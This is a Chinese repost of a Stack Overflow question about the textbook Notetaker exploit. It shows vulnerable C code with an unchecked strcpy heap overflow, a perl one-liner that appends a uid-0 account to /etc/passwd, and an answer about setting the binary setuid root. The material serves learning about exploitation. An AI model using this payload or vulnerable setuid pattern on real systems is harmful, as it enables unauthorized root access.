个人中心
gpt4 book ai didi

c - Notetaker 漏洞利用问题

转载 作者:塔克拉玛干 更新时间:2023-11-03 01:34:50 24 4
gpt4 key购买 nike

此问题涉及《黑客:利用的艺术》一书第 155 页上的一个利用。此处,Notetaker 程序用于将具有 root 权限的条目附加到/etc/passwd 文件中。Notetaker.c 的代码如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // a function for fatal errors
void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper

int main(int argc, char *argv[]) {
   int userid, fd; // file descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't commandline arguments
      usage(argv[0], datafile); // display usage message and exit

   strcpy(buffer, argv[1]);  // copy into buffer

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

 // Opening the file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(fd == -1)
      fatal("in main() while opening file");
   printf("[DEBUG] file descriptor is %d\n", fd);

   userid = getuid(); // get the real user ID

// Writing data
   if(write(fd, &userid, 4) == -1) // write user ID before note data
      fatal("in main() while writing userid to file");
   write(fd, "\n", 1); // terminate line

   if(write(fd, buffer, strlen(buffer)) == -1) // write note
      fatal("in main() while writing buffer to file");
   write(fd, "\n", 1); // terminate line

// Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");

   printf("Note has been saved.\n");
   free(buffer);
   free(datafile);
}

通过/tmp/etc/passwd 创建到/bin/bash 的软链接(soft link)“密码”作为默认密码给出,盐 XX--XXq2wKiyI43A2并且用户 ID 被指定为 0- 以获得 root 权限。漏洞利用如下:

$ ./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 .
":/root:/tmp/etc/passwd"')

当我尝试这个时,我得到的只是一个 fatal error ,同时打开文件说权限被拒绝。它在书中似乎工作得很好,因为 $tail/etc/passwd 通过这个提供 root 访问权限的漏洞显示了新条目。请帮忙。

最佳答案

你需要阅读第二章。它显示您通过 chown 和 chmod u+s 将所有者更改为 root。第 93 页。

关于c - Notetaker 漏洞利用问题,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/21163978/

24 4 0
文章推荐: c++ - QGridLayout : change height of a row
文章推荐: linux - 在 shell 中读取命令
文章推荐: python - 从 Python 脚本调用以在 Linux 中重新启动 "service"在 crontab 条目中不起作用
文章推荐: linux - 在两个单独的文件夹上连续重命名文件
塔克拉玛干
个人简介

我是一名优秀的程序员,十分优秀!

滴滴打车优惠券免费领取
滴滴打车优惠券
全站热门文章
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com